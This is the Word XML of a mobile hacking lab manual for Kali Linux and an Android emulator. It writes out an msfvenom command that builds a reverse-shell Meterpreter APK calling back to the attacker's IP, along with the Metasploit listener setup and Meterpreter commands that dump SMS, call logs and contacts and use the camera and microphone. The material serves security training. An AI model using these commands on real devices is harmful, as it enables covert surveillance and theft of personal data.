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7D17" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>Mobile Hacking manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728AAB5" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>This lab will guide you through simulating mobile hacking techniques using emulators and Kali Linux tools, without requiring a physical mobile device.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29A2F1" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5CD271" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>#### **Prerequisites:**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Kali Linux installed (either natively or in a virtual machine).  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Internet access to download required tools.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Basic knowledge of Linux commands and cybersecurity concepts.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01F931" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C192DC" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152BD565" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA64481" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>## **Lab 1: Setting Up a Mobile Emulator in Kali**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>Since no physical mobile device is available, we will use an Android emulator.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9EE745" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B3D2D" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 1: Install an Android Emulator**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>Use an emulator like **Android Studio AVD** or **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Genymotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>** (recommended).  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>#### **Option 1: Using Android Studio Emulator**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Install Android Studio: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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> apt update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> apt install android-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>sdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> android-tools-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>adb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Open Android Studio and create a virtual device.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>3. Select a system image (preferably an older version of Android to simulate vulnerabilities).  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>4. Start the emulator and ensure **Developer Mode** and **USB Debugging** are enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06AB9B" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2455C" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve">#### **Option 2: Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Genymotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t xml:space="preserve">1. Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Genymotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> from [</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:tooltip="https://www.genymotion.com/](https://www.genymotion.com/)." w:history="1">
        <w:r w:rsidRPr="00E12BED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.genymotion.com/](https://www.genymotion.com/).</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E12BED">
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t xml:space="preserve">2. Install VirtualBox (required for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Genymotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>).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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t xml:space="preserve">3. Install and launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Genymotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>, then create an Android Virtual Device (AVD).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B8B34" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F806E2" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 2: Connect Kali Linux to the Emulator**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Open the terminal in Kali Linux and verify ADB (Android Debug Bridge) is installed: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adb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   If no device is listed, ensure the emulator is running.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Connect Kali to the emulator:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>adb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CE067" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9782E" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14744F5C" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D153D4F" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>## **Lab 2: Exploiting an Android Device Using Metasploit**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>We will create an Android backdoor and execute it in the emulator.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DDE514" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA00E3" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 1: Generate a Malicious APK**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Use **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>** to create a payload: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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> -p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> LHOST=&lt;Kali-IP&gt; LPORT=4444 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>malicious.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Install the APK in the emulator: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adb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>malicious.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0EF62" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C8A86" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 2: Set Up a Listener in Metasploit**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Start Metasploit Framework:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Set up the multi-handler:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   use exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   set payload android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   set LHOST &lt;Kali-IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   set LPORT 4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>   ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>3. If the APK is executed in the emulator, you will get a Meterpreter session.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFAFD56" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5B119" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7D24A" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B424A" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>## **Lab 3: Extracting Data from an Android Device**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>With a Meterpreter session established, we can execute various commands.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373AEFD1" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F0415" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 1: Dump SMS and Call Logs**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:lastRenderedPageBreak/>
        <w:t>dump_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>dump_calllog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C8DB2" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7474A713" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 2: Extract Contacts**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>dump_contacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A73B2" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F754DCD" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 3: Activate Camera and Record Audio**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>webcam_snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>record_mic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> -d 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02369F06" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F4BE0" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E87AD" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7C444" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>## **Lab 4: Mobile Web App Penetration Testing**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>### **Step 1: Capture Traffic Using Burp Suite**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Set up **Burp Suite** as a proxy in Kali Linux.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Configure the emulator to use **Kali’s IP as a proxy** in Wi-Fi settings.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>3. Open a mobile app in the emulator and intercept traffic in Burp Suite.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3139C9" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1782A458" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>### **Step 2: Exploit Insecure API Calls**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>1. Look for **plaintext credentials** in API requests.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>2. Attempt to modify API requests using Burp Suite Repeater.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E79306" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FFF27F" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06B725" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ACEB71" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve">## **Countermeasures and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E12BED">
        <w:t xml:space="preserve"> Strategies**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Always update mobile devices and apps to patch vulnerabilities.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Avoid installing APKs from untrusted sources.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Enable encryption and strong authentication on mobile devices.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12BED">
        <w:br/>
        <w:t>- Use VPNs to secure network connections.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1488F" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D96F1D" w14:textId="77777777" w:rsidR="00E12BED" w:rsidRPr="00E12BED" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484FF027" w14:textId="08888B39" w:rsidR="002D4546" w:rsidRDefault="00E12BED" w:rsidP="00E12BED">
      <w:r w:rsidRPr="00E12BED">
        <w:t> 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F2"/>
    <w:rsid w:val="000B293E"/>
    <w:rsid w:val="002D4546"/>
    <w:rsid w:val="005327C6"/>
    <w:rsid w:val="00B20DAB"/>
    <w:rsid w:val="00BC11F2"/>
    <w:rsid w:val="00E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BE045-6CDE-49FA-894A-79BEA0E7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nymotion.com/%5d(https:/www.genymotion.com/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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-12T04:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-12T04:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>